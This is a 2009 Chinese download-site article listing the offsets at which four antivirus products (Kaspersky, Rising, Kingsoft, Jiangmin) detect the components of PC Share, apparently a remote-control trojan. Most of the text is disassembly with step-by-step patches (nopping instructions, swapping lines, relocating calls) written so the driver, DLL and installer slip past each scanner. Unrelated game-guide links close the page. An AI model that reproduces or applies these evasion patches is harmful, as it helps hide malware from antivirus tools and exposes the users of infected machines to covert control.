pc软件 文章资讯 手机软件

您当前的位置→图文中心安全防范PC Share特征码公布及修改方法
阅读排行

PC Share特征码公布及修改方法


2009/2/21  编辑:佚名 来源:本站整理

1、定位

卡巴:

pchide.sys:

[特征] 00000986_00000001

pcmain.dll

[特征] 0000BB02_00000001

pcinit.exe

[特征] 00000825_00000001

[特征] 00001369_00000001

瑞星:

pchide.sys:

[特征] 00000D56_00000001

pcmain.dll:

[特征] 0000BB49_00000001

pcinit.exe

[特征] 00000673_00000001

[特征] 00000827_00000001

[特征] 00000D5B_00000001

金山:

pchide.sys:

[特征] 00000D3E_00000001

pcmain.dll:

反向:

[特征] 0000BAB4_00000001

[特征] 0000BABB_00000001

[特征] 0000DE28_00000001

[特征] 0000DE79_00000001

pcinit.exe:

[特征] 00001238_00000001

[特征] 00001265_00000001

江民:

pchide.sys:

[特征] 00000DAF_00000001

pcmain.dll:

[特征] 0000BB0A_00000001

pcinit.exe:

[特征] 000008BC_00000001

[特征] 00000EE4_00000001

[特征] 000012BA_00000001

########################################################################################################################

2、修改特征码:

//***********************************************************************************************************************

卡巴:

pchide.sys:

[特征] 00000986_00000001

00010975:  FF15 20030100              CALL [10320]

0001097B:  33C0                       XOR EAX,EAX

0001097D:  EB 11                      JMP SHORT 00010990

0001097F:  50                         PUSH EAX

00010980:  33C0                       XOR EAX,EAX       //nop掉

00010982:  33C0                       XOR EAX,EAX

00010984:  0F84 03000000              JE 0001098D

0001098A:  55                         PUSH EBP

0001098B:  8211 58                    ADC BYTE PTR [ECX],58

//---------------------------------------------------------------------------------------------------------------------

pcmain.dll

[特征] 0000BB02_00000001

1000BAF9:  EB 4E                      JMP SHORT 1000BB49

1000BAFB:  57                         PUSH EDI

1000BAFC:  56                         PUSH ESI

1000BAFD:  53                         PUSH EBX

1000BAFE:  E8 FDF8FFFF                CALL 1000B400     //2、改1000B400为:1000B3F8

1000BB03:  83FE 01                    CMP ESI,1

1000B3F8                                                //1、将1000B400处代码移到此处

1000B3FE:  90                         NOP

1000B3FF:  90                         NOP

1000B400:  8B4424 08                  MOV EAX,[ESP+8]

1000B404:  81EC 24050000              SUB ESP,524

1000B40A:  83F8 01                    CMP EAX,1

1000B40D:  56                         PUSH ESI

1000B40E:  57                         PUSH EDI

//---------------------------------------------------------------------------------------------------------------------

pcinit.exe

[特征] 00000825_00000001  00401425

0040081D:  FFD6                       CALL NEAR ESI

0040081F:  6A 06                      PUSH 1            //

00400821:  58                         POP EAX

00400822:  5F                         POP EDI

00400823:  5E                         POP ESI

00400824:  5B                         POP EBX

00400825:  C9                         LEAVE

[特征] 00001369_00000001  00401F69

该处的call调用, 进入到call内如下, 把其中上面的四句移到空白区域, 然后修改call调用地址, 免杀!

00401429  /$  55                    push    ebp

0040142A  |.  8BEC                  mov     ebp, esp

0040142C  |.  81EC 00010000         sub     esp, 100

00401432  |.  80A5 00FFFFFF 00      and     byte ptr [ebp-100], 0

00401439  |.  56                    push    esi

0040143A  |.  57                    push    edi

55 8B EC 81 EC 00 01 00 00 80 A5 00 FF FF FF 00

00401FDB      00                    db      00

00401FDC      00                    db      00

//***********************************************************************************************************************

瑞星:

pchide.sys:

[特征] 00000D56_00000001

00010D4C:  6A 3B                      PUSH 3B

00010D4E:  59                         POP ECX

00010D4F:  33C0                       XOR EAX,EAX          //sub eax,eax

00010D51:  8DBD 02FEFFFF              LEA EDI,[EBP-1FE]

00010D57:  F3                         REP STOS DWORD PTR ES:[EDI]

//---------------------------------------------------------------------------------------------------------------------

pcmain.dll:(在这一段的起始位置, 有个跳转跳到1000BB49处, 将此处上一句的xor eax, eax nop掉就ok了……)

[特征] 0000BB49_00000001              1000C749

1000BB3A:  85C0                       TEST EAX,EAX

1000BB3C:  74 08                      JE SHORT 1000BB46

1000BB3E:  57                         PUSH EDI

1000BB3F:  56                         PUSH ESI

1000BB40:  53                         PUSH EBX

1000BB41:  FFD0                       CALL EAX

1000BB43:  8945 0C                    MOV [EBP+C],EAX

1000BB46:  8B45 0C                    MOV EAX,[EBP+C]

1000BB49:  5F                         POP EDI

1000BB4A:  5E                         POP ESI

//---------------------------------------------------------------------------------------------------------------------

pcinit.exe

[特征] 00000673_00000001  00401273

00400664:  56                         PUSH ESI

00400665:  8B31                       MOV ESI, [DWORD DS:ECX]

00400667:  57                         PUSH EDI

00400668:  66:8B7C24 0C               MOV DI, [WORD SS:ESP+C]

0040066D:  66:893C96                  MOV [WORD DS:ESI+EDX*4], DI

00400671:  8B31                       MOV ESI, [DWORD DS:ECX]

00400673:  0FB710                     MOVZX EDX, [WORD DS:EAX]       //与上一行交换位置

00400676:  66:8B7C24 10               MOV DI, [WORD SS:ESP+10]

[特征] 00000827_00000001  00401427

0040081D:  FFD6                       CALL NEAR ESI

0040081F:  6A 06                      PUSH 6                   //此处在修改卡巴时已经修改过了:原来为:push 1

00400821:  58                         POP EAX

00400822:  5F                         POP EDI

00400823:  5E                         POP ESI

00400824:  5B                         POP EBX

00400825:  C9                         LEAVE

00400826:  C2 0C00                    RETN C

[特征] 00000D5B_00000001  0040195B

00400D30:  FF15 34204000              CALL NEAR [DWORD DS:402034]

00400D36:  8BF8                       MOV EDI, EAX

00400D38:  897D EC                    MOV [DWORD SS:EBP-14], EDI

00400D3B:  FF15 38204000              CALL NEAR [DWORD DS:402038]

00400D41:  3D B7000000                CMP EAX, B7

00400D46:  0F84 E1020000              JE 0040102D

00400D4C:  68 30750000                PUSH 7530

00400D51:  57                         PUSH EDI

00400D52:  FF15 6C204000              CALL NEAR [DWORD DS:40206C]

00400D58:  85C0                       TEST EAX, EAX              //改为:and  eax,eax

//***********************************************************************************************************************

金山:

pchide.sys:

[特征] 00000D3E_00000001

00010D2A:  73 00                      JNB     SHORT 00010D2C

00010D2C:  5C                         POP     ESP

00010D2D:  0000                       ADD     [EAX],AL

00010D2F:  0055 8B                    ADD     [EBP-75],DL

00010D32:  EC                         IN      AL,DX

00010D33:  81EC 18020000              SUB     ESP,218

00010D39:  56                         PUSH    ESI

00010D3A:  57                         PUSH    EDI

00010D3B:  BE 020D0100                MOV     ESI,10D02

00010D40:  8DBD F0FDFFFF              LEA     EDI,[EBP-210]   //和上一行交换位置!

//---------------------------------------------------------------------------------------------------------------------

pcmain.dll:

反向:

[特征] 0000BAB4_00000001

1000BAB3:  55                         PUSH EBP

1000BAB4:  8BEC                       MOV EBP,ESP  //与下面一行互换, 然后后面的EBP+8等都再加4

1000BAB6:  53                         PUSH EBX

1000BAB7:  8B5D 08                    MOV EBX,[EBP+8]

1000BABA:  56                         PUSH ESI

[特征] 0000BABB_00000001           //上一个已经改了, 在一起

[特征] 0000DE28_00000001              //这两处直接改大小写就ok了……(大写+20h=小写)

[特征] 0000DE79_00000001

//---------------------------------------------------------------------------------------------------------------------

pcinit.exe:

[特征] 00001238_00000001  00401E38

[特征] 00001265_00000001  00401E65

00401259:  8965 E8                    MOV [EBP-18],ESP

0040125C:  33DB                       XOR EBX,EBX

0040125E:  895D FC                    MOV [EBP-4],EBX

00401261:  6A 02                      PUSH 2

00401263:  FF15 8C204000              CALL [40208C]

//***********************************************************************************************************************

江民:

pchide.sys:

[特征] 00000DAF_00000001

00010D96:  59                         POP     ECX

00010D97:  59                         POP     ECX

00010D98:  8D85 F0FDFFFF              LEA     EAX,[EBP-210]

00010D9E:  50                         PUSH    EAX

00010D9F:  8D45 F8                    LEA     EAX,[EBP-8]

00010DA2:  50                         PUSH    EAX

00010DA3:  FF15 10030100              CALL    NEAR [10310]

00010DA9:  68 200F0100                PUSH    10F20

00010DAE:  8D85 F8FEFFFF              LEA     EAX,[EBP-108]     //将这一行与上面一行互换

00010DB4:  50                         PUSH    EAX

//---------------------------------------------------------------------------------------------------------------------

pcmain.dll:

[特征] 0000BB0A_00000001

1000BAF7:  90                         NOP

1000BAF8:  90                         NOP

1000BAF9:  EB 4E                      JMP SHORT 1000BB49

1000BAFB:  57                         PUSH EDI

1000BAFC:  56                         PUSH ESI

1000BAFD:  53                         PUSH EBX

1000BAFE:  E8 F5F8FFFF                CALL 1000B3F8

1000BB03:  83FE 01                    CMP ESI,1

1000BB06:  8945 0C                    MOV [EBP+C],EAX          //与上面一句互换位置!

1000BB09:  75 0C                      JNZ SHORT 1000BB17

1000BB0B:  85C0                       TEST EAX,EAX

1000BB0D:  75 37                      JNZ SHORT 1000BB46

//---------------------------------------------------------------------------------------------------------------------

pcinit.exe:

[特征] 000008BC_00000001  004014BC

[特征] 00000EE4_00000001  00401AE4

00400EC3:  50                         PUSH EAX

00400EC4:  8D86 06080000              LEA EAX,[ESI+806]

00400ECA:  50                         PUSH EAX

00400ECB:  FFD3                       CALL EBX

00400ECD:  8D86 06080000              LEA EAX,[ESI+806]

00400ED3:  68 78304000                PUSH 403078

00400ED8:  50                         PUSH EAX

00400ED9:  FFD3                       CALL EBX

00400EDB:  8D8D 34FEFFFF              LEA ECX,[EBP-1CC]

00400EE1:  8D86 06090000              LEA EAX,[ESI+906]

00400EE7:  51                         PUSH ECX

00400EE8:  50                         PUSH EAX

[特征] 000012BA_00000001  00401EBA         //转移

00401EB8  |.  59                    pop     ecx

00401EB9  |>  E8 E2000000           call    00401FA0

00401EBE  |.  68 0C304000           push    0040300C

00401FA0  /$  68 00000300           push    30000                                     ; /CWmask = 30000

00401FA5  |.  68 00000100           push    10000                                     ; |CWnew = 10000

00401FAA  |.  E8 0D000000           call    <jmp.&MSVCRT._controlfp>                  ; \_controlfp

00401FAF  |.  59                    pop     ecx

00401FB0  |.  59                    pop     ecx

00401FB1  \.  C3                    retn

68 00 00 03 00 68 00 00 01 00

00401FF2      68 00000300           push    30000

相关文章

DNF欲望之塔从哪里进 欲望之塔npc是什么东东:DNF欲望之塔在哪里进?欲望之塔的玩法一共是有四阶段的,分为四段的挂机活动。

魔之符咒6.81名人堂密码魔之符咒6.81隐藏npc在哪里攻略:魔之符咒6.81隐藏npc攻略:魔之符咒隐藏NPC触发条件需要杀死神龙2次黑暗剑圣2次魔界幻兽2次单人杀死神龙2次的方法:先打2把召唤神龙钥匙然后召唤神龙打死神龙先不要转生继续召唤神龙隐藏NPC可以升级天位神器合成魔之封印魔之符咒6.81名...。

dnf时空石在哪里兑换 NPC红尾乔纳森可以兑换什么:时空石在哪里兑换很多玩家还找不到兑换的NPC吧,下面小编就来给大家介绍一下时空石兑换NPC在哪里。

发表评论
网站帮助 - 广告合作 - 下载声明 - 网站地图